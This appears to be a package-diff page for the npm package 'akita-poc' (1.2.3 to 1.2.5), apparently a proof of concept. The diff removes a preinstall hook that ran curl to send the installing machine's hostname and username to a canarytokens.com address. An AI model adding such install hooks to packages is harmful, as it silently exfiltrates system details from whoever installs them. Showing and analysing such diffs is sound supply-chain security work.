akita-poc 1.2.3 → 1.2.5

Sign up to get free protection for your applications and to get access to all the features.
Files changed (1) hide show
  1. package/package.json +3 -3
package/package.json CHANGED
@@ -1,16 +1,16 @@
1
1
  {
2
2
  "name": "akita-poc",
3
- "version": "1.2.3",
3
+ "version": "1.2.5",
4
4
  "description": "poc",
5
5
  "main": "index.js",
6
6
  "scripts": {
7
7
  "test": "echo \"Error: no test specified\" && exit 1",
8
- "preinstall": "curl --data-urlencode info=$(hostname && whoami) http://canarytokens.com/static/vku44mbctn82d4rl7is2qznz5/submit.aspx"
8
+ "preinstall": ""
9
9
  },
10
10
  "author": "Akita",
11
11
  "license": "ISC",
12
12
  "dependencies": {
13
13
  "account": "^1.0.0",
14
- "akita-poc": "^1.2.0"
14
+ "akita-poc": "^1.2.3"
15
15
  }
16
16
  }